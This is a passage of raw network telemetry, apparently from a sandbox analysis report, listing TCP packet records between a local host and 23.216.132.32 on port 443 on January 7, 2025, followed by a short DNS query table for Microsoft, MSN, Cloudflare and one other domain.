                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.701189041 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.701198101 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.720943928 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.833780050 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.860929012 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.862705946 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.862745047 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.862767935 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.862828016 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.863015890 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.863064051 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.863308907 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.868165970 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.868180037 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.868194103 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.868289948 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.868302107 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.868314028 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.868354082 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.868366957 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.868379116 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.868390083 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.868483067 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.868495941 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.868649960 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.894500017 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.896637917 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.984832048 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.993045092 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.999682903 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.999723911 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.999742985 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.999756098 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.999772072 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.999792099 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.999833107 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.999845028 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.999901056 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.999955893 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.999984980 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:17.999996901 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.000217915 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.000555992 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.030745983 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.100944996 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.121916056 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.204437971 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.210875034 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211258888 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211261988 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211272001 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211301088 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211318970 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211329937 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211340904 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211353064 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211364031 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211730003 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211751938 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211762905 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211776972 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211787939 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211798906 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211811066 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211822033 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211833954 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211844921 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.211910009 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.215167999 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.215214968 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.215229034 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.215276957 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.215289116 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.215385914 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.242290020 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:18.318567038 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.093055010 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.100003004 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.100023031 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.100033998 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.100363016 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.107881069 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.204160929 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.210237980 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.210263014 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.210273981 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.210597992 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.217005968 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.321727037 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.330085993 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.330228090 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.330295086 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.330369949 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.338238001 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.434482098 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.441262960 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.441410065 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.441422939 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.442032099 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.442224979 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.442354918 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.454464912 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.550638914 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.555753946 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.555773973 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.555785894 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.556092978 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.565015078 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.661315918 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.666996002 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.667248011 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.667270899 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.667320967 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.675096035 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.771734953 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.778043032 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.778059006 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.778069973 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.778346062 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.787606001 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.884047985 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.888533115 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.888566971 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.888578892 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.888912916 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.896217108 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.992436886 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.998707056 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.998722076 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.998733997 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:23.998985052 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.005376101 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.104418993 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.110624075 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.110636950 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.110646963 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.110939980 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.118231058 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.259047985 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.259291887 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.259442091 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.259623051 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.281083107 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.281095982 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.281106949 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.281414986 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.281476974 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.281512976 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.289074898 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.385339975 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.390611887 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.390686035 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.390697956 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.391052961 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:24.401357889 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.320168972 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.416337967 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.422475100 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.422493935 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.422503948 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.422883034 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.430010080 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.526401043 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.532093048 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.532185078 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.532195091 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.532474995 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.541120052 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.638530016 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.644448042 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.644618988 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.644630909 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.644921064 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.651798010 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.747967958 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.753671885 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.753752947 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.753773928 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.754082918 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.763879061 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.862029076 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.866763115 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.867054939 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.867058039 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.867072105 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.874821901 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.971168041 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.977137089 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.977150917 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.977190018 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.977765083 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:26.984319925 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.080516100 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.087544918 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.087557077 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.087568045 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.087824106 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.095470905 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.191745043 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.198326111 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.198338985 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.198349953 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.198580980 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.204920053 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.301664114 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.307822943 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.307848930 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.307859898 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.308130980 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.314946890 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.411178112 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.417244911 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.417278051 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.417289972 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.417591095 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.417649984 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.417684078 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.423945904 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.571724892 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.577579975 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.577619076 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.577637911 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.577840090 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.585736036 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.688843966 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.693468094 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.693505049 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.693516970 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.693526030 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.693798065 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.693850994 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.693891048 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.700637102 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.796865940 CET4434932323.216.132.32192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 7, 2025 13:18:08.286711931 CET | 192.168.2.7 | 1.1.1.1 | 0xb664 | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:18:54.632966995 CET | 192.168.2.7 | 1.1.1.1 | 0xff0e | Standard query (0) | tataragirld.site | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:04.053396940 CET | 192.168.2.7 | 1.1.1.1 | 0xe8b6 | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:04.053767920 CET | 192.168.2.7 | 1.1.1.1 | 0x5b5b | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false
Jan 7, 2025 13:19:05.486486912 CET | 192.168.2.7 | 1.1.1.1 | 0xad8b | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:05.486867905 CET | 192.168.2.7 | 1.1.1.1 | 0xa3a9 | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false
Jan 7, 2025 13:19:06.490081072 CET | 192.168.2.7 | 1.1.1.1 | 0xd2d3 | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:06.490196943 CET | 192.168.2.7 | 1.1.1.1 | 0x82be | Standard query (0) | sb.scorecardresearch.com | 65 | IN (0x0001) | false
Jan 7, 2025 13:19:06.520065069 CET | 192.168.2.7 | 1.1.1.1 | 0x461f | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:06.520251036 CET | 192.168.2.7 | 1.1.1.1 | 0xaac2 | Standard query (0) | assets.msn.com | 65 | IN (0x0001) | false
Jan 7, 2025 13:19:06.520904064 CET | 192.168.2.7 | 1.1.1.1 | 0xa55f | Standard query (0) | c.msn.com | A (IP address) | IN (0x0001) | false
Jan 7, 2025 13:19:06.521083117 CET | 192.168.2.7 | 1.1.1.1 | 0xe2c7 | Standard query (0) | c.msn.com | 65 | IN (0x0001) | false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.549071074 CET192.168.2.71.1.1.10x490fStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.549328089 CET192.168.2.71.1.1.10x77a3Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.145632029 CET192.168.2.71.1.1.10x6914Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.145824909 CET192.168.2.71.1.1.10x27dbStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
